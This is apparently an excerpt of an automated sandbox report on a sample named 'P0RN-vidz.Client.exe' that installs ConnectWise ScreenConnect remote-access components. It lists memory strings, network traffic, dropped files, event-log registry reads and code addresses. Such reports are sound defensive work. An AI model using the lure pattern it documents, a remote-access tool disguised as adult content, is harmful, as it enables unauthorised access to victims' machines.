                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806033
                  Source: svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060578513.000001CCF8157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000003.2060318852.000001CCF815A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000007.00000002.3280345001.000001CCF868B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAoc
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsuer
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownHTTPS traffic detected: 147.75.81.6:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: P0RN-vidz.Client.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_0037A5E50_2_0037A5E5
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371BD40_2_00371BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EBBAA81_2_00007FF848EBBAA8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E88A101_2_00007FF848E88A10
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA3BC31_2_00007FF848EA3BC3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EAABA51_2_00007FF848EAABA5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EAEAFA1_2_00007FF848EAEAFA
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E89D7D1_2_00007FF848E89D7D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E7AEF51_2_00007FF848E7AEF5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA31CD1_2_00007FF848EA31CD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EB92611_2_00007FF848EB9261
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E833A11_2_00007FF848E833A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848EA24511_2_00007FF848EA2451
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E8D5991_2_00007FF848E8D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E827481_2_00007FF848E82748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E7FA111_2_00007FF848E7FA11
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E930F11_2_00007FF848E930F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E761781_2_00007FF848E76178
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E712111_2_00007FF848E71211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E928601_2_00007FF848E92860
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E711D110_2_00007FF848E711D1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E7141010_2_00007FF848E71410
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E6FE7510_2_00007FF848E6FE75
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E700D310_2_00007FF848E700D3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E7723A13_2_00007FF848E7723A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E7615113_2_00007FF848E76151
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E710CF13_2_00007FF848E710CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E710D713_2_00007FF848E710D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849185CA113_2_00007FF849185CA1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF84918679413_2_00007FF849186794
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780
                  Source: P0RN-vidz.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
